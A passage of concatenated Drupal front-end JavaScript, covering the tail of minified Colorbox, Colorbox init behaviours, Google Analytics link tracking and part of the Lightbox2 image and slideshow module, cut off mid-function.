Date),k.src=K.href,K.scrolling||(k.scrolling="no"),n&&(k.frameBorder=0,k.allowTransparency="true"),a(k).appendTo(A).one(m,function(){k.src="//about:blank"})):l(),K.transition==="fade"?r.fadeTo(d,1,o):o())},K.transition==="fade"?r.fadeTo(d,0,function(){X.position(0,c)}):X.position(d,c)}},X.load=function(b){var c,d,e=X.prep;T=!0,R=!1,P=y[Q],b||_(),ba(m),ba(i,K.onLoad),K.h=K.height?Z(K.height,"y")-N-L:K.innerHeight&&Z(K.innerHeight,"y"),K.w=K.width?Z(K.width,"x")-O-M:K.innerWidth&&Z(K.innerWidth,"x"),K.mw=K.w,K.mh=K.h,K.maxWidth&&(K.mw=Z(K.maxWidth,"x")-O-M,K.mw=K.w&&K.w<K.mw?K.w:K.mw),K.maxHeight&&(K.mh=Z(K.maxHeight,"y")-N-L,K.mh=K.h&&K.h<K.mh?K.h:K.mh),c=K.href,W=setTimeout(function(){C.show()},100),K.inline?(Y().hide().insertBefore(a(c)[0]).one(m,function(){a(this).replaceWith(A.children())}),e(a(c))):K.iframe?e(" "):K.html?e(K.html):$(c)?(a(R=new Image).addClass(f+"Photo").error(function(){K.title=!1,e(Y("Error").text("This image could not be loaded"))}).load(function(){var a;R.onload=null,K.scalePhotos&&(d=function(){R.height-=R.height*a,R.width-=R.width*a},K.mw&&R.width>K.mw&&(a=(R.width-K.mw)/R.width,d()),K.mh&&R.height>K.mh&&(a=(R.height-K.mh)/R.height,d())),K.h&&(R.style.marginTop=Math.max(K.h-R.height,0)/2+"px"),y[1]&&(Q<y.length-1||K.loop)&&(R.style.cursor="pointer",R.onclick=function(){X.next()}),n&&(R.style.msInterpolationMode="bicubic"),setTimeout(function(){e(R)},1)}),setTimeout(function(){R.src=c},1)):c&&B.load(c,K.data,function(b,c,d){e(c==="error"?Y("Error").text("Request unsuccessful: "+d.statusText):a(this).contents())})},X.next=function(){!T&&y[1]&&(Q<y.length-1||K.loop)&&(Q=Q<y.length-1?Q+1:0,X.load())},X.prev=function(){!T&&y[1]&&(Q||K.loop)&&(Q=Q?Q-1:y.length-1,X.load())},X.close=function(){S&&!U&&(U=!0,S=!1,ba(k,K.onCleanup),z.unbind("."+f+" ."+p),q.fadeTo(200,0),r.stop().fadeTo(300,0,function(){r.add(q).css({opacity:1,cursor:"auto"}).hide(),ba(m),A.remove(),setTimeout(function(){U=!1,ba(l,K.onClosed)},1)}))},X.element=function(){return a(P)},X.settings=d,V=function(a){a.button!==0&&typeof a.button!="undefined"||a.ctrlKey||a.shiftKey||a.altKey||(a.preventDefault(),bc(this))},a.fn.delegate?a(b).delegate("."+g,"click",V):a("."+g).live("click",V),a(X.init)})(jQuery,document,this);;
(function ($) {

Drupal.behaviors.initColorbox = function (context) {
  if (!$.isFunction($.colorbox)) {
    return;
  }
  $('a, area, input', context)
    .filter('.colorbox:not(.initColorbox-processed)')
    .addClass('initColorbox-processed')
    .colorbox(Drupal.settings.colorbox);
};

{
  $(document).bind('cbox_complete', function () {
    Drupal.attachBehaviors('#cboxLoadedContent');
  });
}

})(jQuery);
;
(function ($) {

Drupal.behaviors.initColorboxDefaultStyle = function (context) {
  $(document).bind('cbox_complete', function () {
    // Only run if there is a title.
    if ($('#cboxTitle:empty', context).length == false) {
      setTimeout(function () { $('#cboxTitle', context).slideUp() }, 1500);
      $('#cboxLoadedContent img', context).bind('mouseover', function () {
        $('#cboxTitle', context).slideDown();
      });
      $('#cboxOverlay', context).bind('mouseover', function () {
        $('#cboxTitle', context).slideUp();
      });
    }
    else {
      $('#cboxTitle', context).hide();
    }
  });
};

})(jQuery);
;
(function ($) {

Drupal.behaviors.initColorboxLoad = function (context) {
  if (!$.isFunction($.colorbox)) {
    return;
  }
  var settings = Drupal.settings.colorbox;
  $.urlParam = function(name, url){
    var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(url);
    if (!results) { return ''; }
    return results[1] || '';
  };
  $('a, area, input', context).filter('.colorbox-load:not(.initColorboxLoad-processed)').addClass('initColorboxLoad-processed').colorbox({
    transition:settings.transition,
    speed:settings.speed,
    opacity:settings.opacity,
    slideshowAuto:settings.slideshowAuto,
    slideshowSpeed:settings.slideshowSpeed,
    slideshowStart:settings.slideshowStart,
    slideshowStop:settings.slideshowStop,
    current:settings.current,
    previous:settings.previous,
    next:settings.next,
    close:settings.close,
    overlayClose:settings.overlayClose,
    maxWidth:settings.maxWidth,
    maxHeight:settings.maxHeight,
    innerWidth:function(){
      return $.urlParam('width', $(this).attr('href'));
    },
    innerHeight:function(){
      return $.urlParam('height', $(this).attr('href'));
    },
    iframe:function(){
      return $.urlParam('iframe', $(this).attr('href'));
    },
    slideshow:function(){
      return $.urlParam('slideshow', $(this).attr('href'));
    }
  });
};

})(jQuery);
;
(function ($) {

Drupal.behaviors.initColorboxInline = function (context) {
  if (!$.isFunction($.colorbox)) {
    return;
  }
  var settings = Drupal.settings.colorbox;
  $.urlParam = function(name, url){
    if (name == 'fragment') {
      var results = new RegExp('(#[^&#]*)').exec(url);
    }
    else {
      var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(url);
    }
    if (!results) { return ''; }
    return results[1] || '';
  };
  $('a, area, input', context).filter('.colorbox-inline:not(.initColorboxInline-processed)').addClass('initColorboxInline-processed').colorbox({
    transition:settings.transition,
    speed:settings.speed,
    opacity:settings.opacity,
    slideshow:settings.slideshow,
    slideshowAuto:settings.slideshowAuto,
    slideshowSpeed:settings.slideshowSpeed,
    slideshowStart:settings.slideshowStart,
    slideshowStop:settings.slideshowStop,
    current:settings.current,
    previous:settings.previous,
    next:settings.next,
    close:settings.close,
    overlayClose:settings.overlayClose,
    maxWidth:settings.maxWidth,
    maxHeight:settings.maxHeight,
    innerWidth:function(){
      return $.urlParam('width', $(this).attr('href'));
    },
    innerHeight:function(){
      return $.urlParam('height', $(this).attr('href'));
    },
    title:function(){
      return $.urlParam('title', $(this).attr('href'));
    },
    iframe:function(){
      return $.urlParam('iframe', $(this).attr('href'));
    },
    inline:function(){
      return $.urlParam('inline', $(this).attr('href'));
    },
    href:function(){
      return $.urlParam('fragment', $(this).attr('href'));
    }
  });
};

})(jQuery);
;

$(document).ready(function() {

  // Attach onclick event to document only and catch clicks on all elements.
  $(document.body).click(function(event) {
    // Catch only the first parent link of a clicked element.
    $(event.target).parents("a:first,area:first").andSelf().filter("a,area").each(function() {

      var ga = Drupal.settings.googleanalytics;
      // Expression to check for absolute internal links.
      var isInternal = new RegExp("^(https?):\/\/" + window.location.host, "i");
      // Expression to check for special links like gotwo.module /go/* links.
      var isInternalSpecial = new RegExp("(\/go\/.*)$", "i");
      // Expression to check for download links.
      var isDownload = new RegExp("\\.(" + ga.trackDownloadExtensions + ")$", "i");

      // Is the clicked URL internal?
      if (isInternal.test(this.href)) {
        // Is download tracking activated and the file extension configured for download tracking?
        if (ga.trackDownload && isDownload.test(this.href)) {
          // Download link clicked.
          var extension = isDownload.exec(this.href);
          _gaq.push(["_trackEvent", "Downloads", extension[1].toUpperCase(), this.href.replace(isInternal, '')]);
        }
        else if (isInternalSpecial.test(this.href)) {
          // Keep the internal URL for Google Analytics website overlay intact.
          _gaq.push(["_trackPageview", this.href.replace(isInternal, '')]);
        }
      }
      else {
        if (ga.trackMailto && $(this).is("a[href^=mailto:],area[href^=mailto:]")) {
          // Mailto link clicked.
          _gaq.push(["_trackEvent", "Mails", "Click", this.href.substring(7)]);
        }
        else if (ga.trackOutgoing && this.href) {
          if (ga.trackOutboundAsPageview) {
            // Track all external links as page views after URL cleanup.
            // Currently required, if click should be tracked as goal.
            _gaq.push(["_trackPageview", '/outbound/' + this.href.replace(/^(https?|ftp|news|nntp|telnet|irc|ssh|sftp|webcal):\/\//i, '').split('/').join('--')]);
          }
          else {
            // External link clicked.
            _gaq.push(["_trackEvent", "Outbound links", "Click", this.href]);
          }
        }
      }
    });
  });
});
;
/* $Id: lightbox.js,v 1.5.2.6.2.136 2010/09/24 08:39:40 snpower Exp $ */

/**
 * jQuery Lightbox
 * @author
 *   Stella Power, <http://drupal.org/user/66894>
 *
 * Based on Lightbox v2.03.3 by Lokesh Dhakar
 * <http://www.huddletogether.com/projects/lightbox2/>
 * Also partially based on the jQuery Lightbox by Warren Krewenki
 *   <http://warren.mesozen.com>
 *
 * Permission has been granted to Mark Ashmead & other Drupal Lightbox2 module
 * maintainers to distribute this file via Drupal.org
 * Under GPL license.
 *
 * Slideshow, iframe and video functionality added by Stella Power.
 */

var Lightbox = {
  auto_modal : false,
  overlayOpacity : 0.8, // Controls transparency of shadow overlay.
  overlayColor : '000', // Controls colour of shadow overlay.
  disableCloseClick : true,
  // Controls the order of the lightbox resizing animation sequence.
  resizeSequence: 0, // 0: simultaneous, 1: width then height, 2: height then width.
  resizeSpeed: 'normal', // Controls the speed of the lightbox resizing animation.
  fadeInSpeed: 'normal', // Controls the speed of the image appearance.
  slideDownSpeed: 'slow', // Controls the speed of the image details appearance.
  minWidth: 240,
  borderSize : 10,
  boxColor : 'fff',
  fontColor : '000',
  topPosition : '',
  infoHeight: 20,
  alternative_layout : false,
  imageArray : [],
  imageNum : null,
  total : 0,
  activeImage : null,
  inprogress : false,
  disableResize : false,
  disableZoom : false,
  isZoomedIn : false,
  rtl : false,
  loopItems : false,
  keysClose : ['c', 'x', 27],
  keysPrevious : ['p', 37],
  keysNext : ['n', 39],
  keysZoom : ['z'],
  keysPlayPause : [32],

  // Slideshow options.
  slideInterval : 5000, // In milliseconds.
  showPlayPause : true,
  autoStart : true,
  autoExit : true,
  pauseOnNextClick : false, // True to pause the slideshow when the "Next" button is clicked.
  pauseOnPrevClick : true, // True to pause the slideshow when the "Prev" button is clicked.
  slideIdArray : [],
  slideIdCount : 0,
  isSlideshow : false,
  isPaused : false,
  loopSlides : false,

  // Iframe options.
  isLightframe : false,
  iframe_width : 600,
  iframe_height : 400,
  iframe_border : 1,

  // Video and modal options.
  enableVideo : false,
  flvPlayer : '/flvplayer.swf',
  flvFlashvars : '',
  isModal : false,
  isVideo : false,
  videoId : false,
  modalWidth : 400,
  modalHeight : 400,
  modalHTML : null,


  // initialize()
  // Constructor runs on completion of the DOM loading.
  // The function inserts html at the bottom of the page which is used
  // to display the shadow overlay and the image container.
  initialize: function() {

    var s = Drupal.settings.lightbox2;
    Lightbox.overlayOpacity = s.overlay_opacity;
    Lightbox.overlayColor = s.overlay_color;
    Lightbox.disableCloseClick = s.disable_close_click;
    Lightbox.resizeSequence = s.resize_sequence;
    Lightbox.resizeSpeed = s.resize_speed;
    Lightbox.fadeInSpeed = s.fade_in_speed;
    Lightbox.slideDownSpeed = s.slide_down_speed;
    Lightbox.borderSize = s.border_size;
    Lightbox.boxColor = s.box_color;
    Lightbox.fontColor = s.font_color;
    Lightbox.topPosition = s.top_position;
    Lightbox.rtl = s.rtl;
    Lightbox.loopItems = s.loop_items;
    Lightbox.keysClose = s.keys_close.split(" ");
    Lightbox.keysPrevious = s.keys_previous.split(" ");
    Lightbox.keysNext = s.keys_next.split(" ");
    Lightbox.keysZoom = s.keys_zoom.split(" ");
    Lightbox.keysPlayPause = s.keys_play_pause.split(" ");
    Lightbox.disableResize = s.disable_resize;
    Lightbox.disableZoom = s.disable_zoom;
    Lightbox.slideInterval = s.slideshow_interval;
    Lightbox.showPlayPause = s.show_play_pause;
    Lightbox.showCaption = s.show_caption;
    Lightbox.autoStart = s.slideshow_automatic_start;
    Lightbox.autoExit = s.slideshow_automatic_exit;
    Lightbox.pauseOnNextClick = s.pause_on_next_click;
    Lightbox.pauseOnPrevClick = s.pause_on_previous_click;
    Lightbox.loopSlides = s.loop_slides;
    Lightbox.alternative_layout = s.use_alt_layout;
    Lightbox.iframe_width = s.iframe_width;
    Lightbox.iframe_height = s.iframe_height;
    Lightbox.iframe_border = s.iframe_border;
    Lightbox.enableVideo = s.enable_video;
    if (s.enable_video) {
      Lightbox.flvPlayer = s.flvPlayer;
      Lightbox.flvFlashvars = s.flvFlashvars;
    }

    // Make the lightbox divs.
    var layout_class = (s.use_alt_layout ? 'lightbox2-alt-layout' : 'lightbox2-orig-layout');
    var output = '<div id="lightbox2-overlay" style="display: none;"></div>\
      <div id="lightbox" style="display: none;" class="' + layout_class + '">\
        <div id="outerImageContainer"></div>\
        <div id="imageDataContainer" class="clearfix">\
          <div id="imageData"></div>\
        </div>\
      </div>';
    var loading = '<div id="loading"><a href="#" id="loadingLink"></a></div>';
    var modal = '<div id="modalContainer" style="display: none;"></div>';
    var frame = '<div id="frameContainer" style="display: none;"></div>';
    var imageContainer = '<div id="imageContainer" style="display: none;"></div>';
    var details = '<div id="imageDetails"></div>';
    var bottomNav = '<div id="bottomNav"></div>';
    var image = '<img id="lightboxImage" alt="" />';
    var hoverNav = '<div id="hoverNav"><a id="prevLink" href="#"></a><a id="nextLink" href="#"></a></div>';
    var frameNav = '<div id="frameHoverNav"><a id="framePrevLink" href="#"></a><a id="frameNextLink" href="#"></a></div>';
    var hoverNav = '<div id="hoverNav"><a id="prevLink" title="' + Drupal.t('Previous') + '" href="#"></a><a id="nextLink" title="' + Drupal.t('Next') + '" href="#"></a></div>';
    var frameNav = '<div id="frameHoverNav"><a id="framePrevLink" title="' + Drupal.t('Previous') + '" href="#"></a><a id="frameNextLink" title="' + Drupal.t('Next') + '" href="#"></a></div>';
    var caption = '<span id="caption"></span>';
    var numberDisplay = '<span id="numberDisplay"></span>';
    var close = '<a id="bottomNavClose" title="' + Drupal.t('Close') + '" href="#"></a>';
    var zoom = '<a id="bottomNavZoom" href="#"></a>';
    var zoomOut = '<a id="bottomNavZoomOut" href="#"></a>';
    var pause = '<a id="lightshowPause" title="' + Drupal.t('Pause Slideshow') + '" href="#" style="display: none;"></a>';
    var play = '<a id="lightshowPlay" title="' + Drupal.t('Play Slideshow') + '" href="#" style="display: none;"></a>';

    $("body").append(output);
    $('#outerImageContainer').append(modal + frame + imageContainer + loading);
    if (!s.use_alt_layout) {
      $('#imageContainer').append(image + hoverNav);
      $('#imageData').append(details + bottomNav);
      $('#imageDetails').append(caption + numberDisplay);
      $('#bottomNav').append(frameNav + close + zoom + zoomOut + pause + play);
    }
    else {
      $('#outerImageContainer').append(bottomNav);
      $('#imageContainer').append(image);
      $('#bottomNav').append(close + zoom + zoomOut);
      $('#imageData').append(hoverNav + details);
      $('#imageDetails').append(caption + numberDisplay + pause + play);
    }

    // Setup onclick handlers.
    if (Lightbox.disableCloseClick) {
      $('#lightbox2-overlay').click(function() { Lightbox.end(); return false; } ).hide();
    }
    $('#loadingLink, #bottomNavClose').click(function() { Lightbox.end('forceClose'); return false; } );
    $('#prevLink, #framePrevLink').click(function() { Lightbox.changeData(Lightbox.activeImage - 1); return false; } );
    $('#nextLink, #frameNextLink').click(function() { Lightbox.changeData(Lightbox.activeImage + 1); return false; } );
    $('#bottomNavZoom').click(function() { Lightbox.changeData(Lightbox.activeImage, true); return false; } );
    $('#bottomNavZoomOut').click(function() { Lightbox.changeData(Lightbox.activeImage, false); return false; } );
    $('#lightshowPause').click(function() { Lightbox.togglePlayPause("lightshowPause", "lightshowPlay"); return false; } );
    $('#lightshowPlay').click(function() { Lightbox.togglePlayPause("lightshowPlay", "lightshowPause"); return false; } );

    // Fix positioning.
    $('#prevLink, #nextLink, #framePrevLink, #frameNextLink').css({ 'paddingTop': Lightbox.borderSize + 'px'});
    $('#imageContainer, #frameContainer, #modalContainer').css({ 'padding': Lightbox.borderSize + 'px'});
    $('#outerImageContainer, #imageDataContainer, #bottomNavClose').css({'backgroundColor': '#' + Lightbox.boxColor, 'color': '#'+Lightbox.fontColor});
    if (Lightbox.alternative_layout) {
      $('#bottomNavZoom, #bottomNavZoomOut').css({'bottom': Lightbox.borderSize + 'px', 'right': Lightbox.borderSize + 'px'});
    }
    else if (Lightbox.rtl == 1 && $.browser.msie) {
      $('#bottomNavZoom, #bottomNavZoomOut').css({'left': '0px'});
    }

    // Force navigation links to always be displayed
    if (s.force_show_nav) {
      $('#prevLink, #nextLink').addClass("force_show_nav");
    }

  },

  // initList()
  // Loops through anchor tags looking for 'lightbox', 'lightshow' and
  // 'lightframe', etc, references and applies onclick events to appropriate
  // links. You can rerun after dynamically adding images w/ajax.
  initList : function(context) {

    if (context == undefined || context == null) {
      context = document;
    }

    // Attach lightbox to any links with rel 'lightbox', 'lightshow' or
    // 'lightframe', etc.
    $("a[rel^='lightbox']:not(.lightbox-processed), area[rel^='lightbox']:not(.lightbox-processed)", context).addClass('lightbox-processed').click(function(e) {
      if (Lightbox.disableCloseClick) {
        $('#lightbox').unbind('click');
        $('#lightbox').click(function() { Lightbox.end('forceClose'); } );
      }
      Lightbox.start(this, false, false, false, false);
      if (e.preventDefault) { e.preventDefault(); }
      return false;
    });
    $("a[rel^='lightshow']:not(.lightbox-processed), area[rel^='lightshow']:not(.lightbox-processed)", context).addClass('lightbox-processed').click(function(e) {
      if (Lightbox.disableCloseClick) {
        $('#lightbox').unbind('click');
        $('#lightbox').click(function() { Lightbox.end('forceClose'); } );
      }
      Lightbox.start(this, true, false, false, false);
      if (e.preventDefault) { e.preventDefault(); }
      return false;
    });
    $("a[rel^='lightframe']:not(.lightbox-processed), area[rel^='lightframe']:not(.lightbox-processed)", context).addClass('lightbox-processed').click(function(e) {
      if (Lightbox.disableCloseClick) {
        $('#lightbox').unbind('click');
        $('#lightbox').click(function() { Lightbox.end('forceClose'); } );
      }
      Lightbox.start(this, false, true, false, false);
      if (e.preventDefault) { e.preventDefault(); }
      return false;
    });
    if (Lightbox.enableVideo) {
      $("a[rel^='lightvideo']:not(.lightbox-processed), area[rel^='lightvideo']:not(.lightbox-processed)", context).addClass('lightbox-processed').click(function(e) {
        if (Lightbox.disableCloseClick) {
          $('#lightbox').unbind('click');
          $('#lightbox').click(function() { Lightbox.end('forceClose'); } );
        }
        Lightbox.start(this, false, false, true, false);
        if (e.preventDefault) { e.preventDefault(); }
        return false;
      });
    }
    $("a[rel^='lightmodal']:not(.lightbox-processed), area[rel^='lightmodal']:not(.lightbox-processed)", context).addClass('lightbox-processed').click(function(e) {
      $('#lightbox').unbind('click');
      // Add classes from the link to the lightbox div - don't include lightbox-processed
      $('#lightbox').addClass($(this).attr('class'));
      $('#lightbox').removeClass('lightbox-processed');
      Lightbox.start(this, false, false, false, true);
      if (e.preventDefault) { e.preventDefault(); }
      return false;
    });
    $("#lightboxAutoModal:not(.lightbox-processed)", context).addClass('lightbox-processed').click(function(e) {
      Lightbox.auto_modal = true;
      $('#lightbox').unbind('click');
      Lightbox.start(this, false, false, false, true);
      if (e.preventDefault) { e.preventDefault(); }
      return false;
    });
  },

  // start()
  // Display overlay and lightbox. If image is part of a set, add siblings to
  // imageArray.
  start: function(imageLink, slideshow, lightframe, lightvideo, lightmodal) {

    Lightbox.isPaused = !Lightbox.autoStart;

    // Replaces hideSelectBoxes() and hideFlash() calls in original lightbox2.
    Lightbox.toggleSelectsFlash('hide');

    // Stretch overlay to fill page and fade in.
    var arrayPageSize = Lightbox.getPageSize();
    $("#lightbox2-overlay").hide().css({
      'width': '100%',
      'zIndex': '10090',
      'height': arrayPageSize[1] + 'px',
      'backgroundColor' : '#' + Lightbox.overlayColor
    });
    // Detect OS X FF2 opacity + flash issue.
    if (lightvideo && this.detectMacFF2()) {
      $("#lightbox2-overlay").removeClass("overlay_default");
      $("#lightbox2-overlay").addClass("overlay_macff2");
      $("#lightbox2-overlay").css({'opacity' : null});
    }
    else {
      $("#lightbox2-overlay").removeClass("overlay_macff2");
      $("#lightbox2-overlay").addClass("overlay_default");
      $("#lightbox2-overlay").css({'opacity' : Lightbox.overlayOpacity});
    }
    $("#lightbox2-overlay").fadeIn(Lightbox.fadeInSpeed);


    Lightbox.isSlideshow = slideshow;
    Lightbox.isLightframe = lightframe;
    Lightbox.isVideo = lightvideo;
    Lightbox.isModal = lightmodal;
    Lightbox.imageArray = [];
    Lightbox.imageNum = 0;

    var anchors = $(imageLink.tagName);
    var anchor = null;
    var rel_parts = Lightbox.parseRel(imageLink);
    var rel = rel_parts["rel"];
    var rel_group = rel_parts["group"];
    var title = (rel_parts["title"] ? rel_parts["title"] : imageLink.title);
    var rel_style = null;
    var i = 0;

    if (rel_parts["flashvars"]) {
      Lightbox.flvFlashvars = Lightbox.flvFlashvars + '&' + rel_parts["flashvars"];
    }

    // Set the title for image alternative text.
    var alt = imageLink.title;
    if (!alt) {
      var img = $(imageLink).find("img");
      if (img && $(img).attr("alt")) {
        alt = $(img).attr("alt");
      }
      else {
        alt = title;
      }
    }

    if ($(imageLink).attr('id') == 'lightboxAutoModal') {
      rel_style = rel_parts["style"];
      Lightbox.imageArray.push(['#lightboxAutoModal > *', title, alt, rel_style, 1]);
    }
    else {
      // Handle lightbox images with no grouping.
      if ((rel == 'lightbox' || rel == 'lightshow') && !rel_group) {
        Lightbox.imageArray.push([imageLink.href, title, alt]);
      }

      // Handle other items with no grouping.
      else if (!rel_group) {
        rel_style = rel_parts["style"];
        Lightbox.imageArray.push([imageLink.href, title, alt, rel_style]);
      }

      // Handle grouped items.
      else {

        // Loop through anchors and add them to imageArray.
        for (i = 0; i < anchors.length; i++) {
          anchor = anchors[i];
          if (anchor.href && typeof(anchor.href) == "string" && $(anchor).attr('rel')) {
            var rel_data = Lightbox.parseRel(anchor);
            var anchor_title = (rel_data["title"] ? rel_data["title"] : anchor.title);
            img_alt = anchor.title;
            if (!img_alt) {
              var anchor_img = $(anchor).find("img");
              if (anchor_img && $(anchor_img).attr("alt")) {
                img_alt = $(anchor_img).attr("alt");
              }
              else {
                img_alt = title;
              }
            }
            if (rel_data["rel"] == rel) {
              if (rel_data["group"] == rel_group) {
                if (Lightbox.isLightframe || Lightbox.isModal || Lightbox.isVideo) {
                  rel_style = rel_data["style"];
                }
                Lightbox.imageArray.push([anchor.href, anchor_title, img_alt, rel_style]);
              }
            }
          }
        }

        // Remove duplicates.
        for (i = 0; i < Lightbox.imageArray.length; i++) {
          for (j = Lightbox.imageArray.length-1; j > i; j--) {
            if (Lightbox.imageArray[i][0] == Lightbox.imageArray[j][0]) {
              Lightbox.imageArray.splice(j,1);
            }
          }
        }
        while (Lightbox.imageArray[Lightbox.imageNum][0] != imageLink.href) {
          Lightbox.imageNum++;
        }
      }
    }

    if (Lightbox.isSlideshow && Lightbox.showPlayPause && Lightbox.isPaused) {
      $('#lightshowPlay').show();
      $('#lightshowPause').hide();
    }

    // Calculate top and left offset for the lightbox.
    var arrayPageScroll = Lightbox.getPageScroll();
    var lightboxTop = arrayPageScroll[1] + (Lightbox.topPosition == '' ? (arrayPageSize[3] / 10) : Lightbox.topPosition) * 1;
    var lightboxLeft = arrayPageScroll[0];
    $('#frameContainer, #modalContainer, #lightboxImage').hide();
    $('#hoverNav, #prevLink, #nextLink, #frameHoverNav, #framePrevLink, #frameNextLink').hide();
    $('#imageDataContainer, #numberDisplay, #bottomNavZoom, #bottomNavZoomOut').hide();
    $('#outerImageContainer').css({'width': '250px', 'height': '250px'});
    $('#lightbox').css({
      'zIndex': '10500',
      'top': lightboxTop + 'px',
      'left': lightboxLeft + 'px'
    }).show();

    Lightbox.total = Lightbox.imageArray.length;
    Lightbox.changeData(Lightbox.imageNum);
  },

  // changeData()
  // Hide most elements and preload image in preparation for resizing image
  // container.
  changeData: function(imageNum, zoomIn) {

    if (Lightbox.inprogress === false) {
      if (Lightbox.total > 1 && ((Lightbox.isSlideshow && Lightbox.loopSlides) || (!Lightbox.isSlideshow && Lightbox.loopItems))) {
        if (imageNum >= Lightbox.total) imageNum = 0;
        if (imageNum < 0) imageNum = Lightbox.total - 1;
      }

      if (Lightbox.isSlideshow) {
        for (var i = 0; i < Lightbox.slideIdCount; i++) {
          window.clearTimeout(Lightbox.slideIdArray[i]);
        }
      }
      Lightbox.inprogress = true;
      Lightbox.activeImage = imageNum;

      if (Lightbox.disableResize && !Lightbox.isSlideshow) {
        zoomIn = true;
      }
      Lightbox.isZoomedIn = zoomIn;


      // Hide elements during transition.
      $('#loading').css({'zIndex': '10500'}).show();
      if (!Lightbox.alternative_layout) {
        $('#imageContainer').hide();
      }
      $('#frameContainer, #modalContainer, #lightboxImage').hide();
      $('#hoverNav, #prevLink, #nextLink, #frameHoverNav, #framePrevLink, #frameNextLink').hide();
      $('#imageDataContainer, #numberDisplay, #bottomNavZoom, #bottomNavZoomOut').hide();

      // Preload image content, but not iframe pages.
      if (!Lightbox.isLightframe && !Lightbox.isVideo && !Lightbox.isModal) {
        $("#lightbox #imageDataContainer").removeClass('lightbox2-alt-layout-data');
        imgPreloader = new Image();
        imgPreloader.onerror = function() { Lightbox.imgNodeLoadingError(this); };

        imgPreloader.onload = function() {
          var photo = document.getElementById('lightboxImage');
          photo.src = Lightbox.imageArray[Lightbox.activeImage][0];
          photo.alt = Lightbox.imageArray[Lightbox.activeImage][2];

          var imageWidth = imgPreloader.width;
          var imageHeight = imgPreloader.height;

          // Resize code.
          var arrayPageSize = Lightbox.getPageSize();
          var targ = { w:arrayPageSize[2] - (Lightbox.borderSize * 2), h:arrayPageSize[3] - (Lightbox.borderSize * 6) - (Lightbox.infoHeight * 4) - (arrayPageSize[3] / 10) };
          var orig = { w:imgPreloader.width, h:imgPreloader.height };

          // Image is very large, so show a smaller version of the larger image
          // with zoom button.
          if (zoomIn !== true) {
            var ratio = 1.0; // Shrink image with the same aspect.
            $('#bottomNavZoomOut, #bottomNavZoom').hide();
            if ((orig.w >= targ.w || orig.h >= targ.h) && orig.h && orig.w) {
              ratio = ((targ.w / orig.w) < (targ.h / orig.h)) ? targ.w / orig.w : targ.h / orig.h;
              if (!Lightbox.disableZoom && !Lightbox.isSlideshow) {
                $('#bottomNavZoom').css({'zIndex': '10500'}).show();
              }
            }

            imageWidth  = Math.floor(orig.w * ratio);
            imageHeight = Math.floor(orig.h * ratio);
          }

          else {
            $('#bottomNavZoom').hide();
            // Only display zoom out button if the image is zoomed in already.
            if ((orig.w >= targ.w || orig.h >= targ.h) && orig.h && orig.w) {
              // Only display zoom out button if not a slideshow and if the
              // buttons aren't disabled.
              if (!Lightbox.disableResize && Lightbox.isSlideshow === false && !Lightbox.disableZoom) {
                $('#bottomNavZoomOut').css({'zIndex': '10500'}).show();
              }
            }
          }

          photo.style.width = (imageWidth) + 'px';
          photo.style.height = (imageHeight) + 'px';
          Lightbox.resizeContainer(imageWidth, imageHeight);

          // Clear onLoad, IE behaves irratically with animated gifs otherwise.
          imgPreloader.onload = function() {};
        };

        imgPreloader.src = Lightbox.imageArray[Lightbox.activeImage][0];
        imgPreloader.alt = Lightbox.imageArray[Lightbox.activeImage][2];
      }

      // Set up frame size, etc.
      else if (Lightbox.isLightframe) {
        $("#lightbox #imageDataContainer").addClass('lightbox2-alt-layout-data');
        var src = Lightbox.imageArray[Lightbox.activeImage][0];
        $('#frameContainer').html('<iframe id="lightboxFrame" style="display: none;" src="'+src+'"></iframe>');

        // Enable swf support in Gecko browsers.
        if ($.browser.mozilla && src.indexOf('.swf') != -1) {
          setTimeout(function () {
            document.getElementById("lightboxFrame").src = Lightbox.imageArray[Lightbox.activeImage][0];
          }, 1000);
        }

        if (!Lightbox.iframe_border) {
          $('#lightboxFrame').css({'border': 'none'});
          $('#lightboxFrame').attr('frameborder', '0');
        }
        var iframe = document.getElementById('lightboxFrame');
        var iframeStyles = Lightbox.imageArray[Lightbox.activeImage][3];
        iframe = Lightbox.setStyles(iframe, iframeStyles);
        Lightbox.resizeContainer(parseInt(iframe.width, 10), parseInt(iframe.height, 10));
      }
      else if (Lightbox.isVideo || Lightbox.isModal) {
        $("#lightbox #imageDataContainer").addClass('lightbox2-alt-layout-data');
        var container = document.getElementById('modalContainer');
        var modalStyles = Lightbox.imageArray[Lightbox.activeImage][3];
        container = Lightbox.setStyles(container, modalStyles);
        if (Lightbox.isVideo) {
          Lightbox.modalHeight =  parseInt(container.height, 10) - 10;
          Lightbox.modalWidth =  parseInt(container.width, 10) - 10;
          Lightvideo.startVideo(Lightbox.imageArray[Lightbox.activeImage][0]);
        }
        Lightbox.resizeContainer(parseInt(container.width, 10), parseInt(container.height, 10));
      }
    }
  },

  // imgNodeLoadingError()
  imgNodeLoadingError: function(image) {
    var s = Drupal.settings.lightbox2;
    var original_image = Lightbox.imageArray[Lightbox.activeImage][0];
    if (s.display_image_size !== "") {
      original_image = original_image.replace(new RegExp("."+s.display_image_size), "");
    }
    Lightbox.imageArray[Lightbox.activeImage][0] = original_image;
    image.onerror = function() { Lightbox.imgLoadingError(image); };
    image.src = original_image;
  },

  // imgLoadingError()
  imgLoadingError: function(image) {
    var s = Drupal.settings.lightbox2;
    Lightbox.imageArray[Lightbox.activeImage][0] = s.default_image;
    image.src = s.default_image;
  },

  // resizeContainer()
  resizeContainer: function(imgWidth, imgHeight) {

    imgWidth = (imgWidth < Lightbox.minWidth ? Lightbox.minWidth : imgWidth);

    this.widthCurrent = $('#outerImageContainer').width();
    this.heightCurrent = $('#outerImageContainer').height();

    var widthNew = (imgWidth  + (Lightbox.borderSize * 2));
    var heightNew = (imgHeight  + (Lightbox.borderSize * 2));

    // Scalars based on change from old to new.
    this.xScale = ( widthNew / this.widthCurrent) * 100;
    this.yScale = ( heightNew / this.heightCurrent) * 100;

    // Calculate size difference between new and old image, and resize if
    // necessary.
    wDiff = this.widthCurrent - widthNew;
    hDiff = this.heightCurrent - heightNew;

    $('#modalContainer').css({'width': imgWidth, 'height': imgHeight});
    // Detect animation sequence.
    if (Lightbox.resizeSequence) {
      var animate1 = {width: widthNew};
      var animate2 = {height: heightNew};
      if (Lightbox.resizeSequence == 2) {
        animate1 = {height: heightNew};
        animate2 = {width: widthNew};
      }
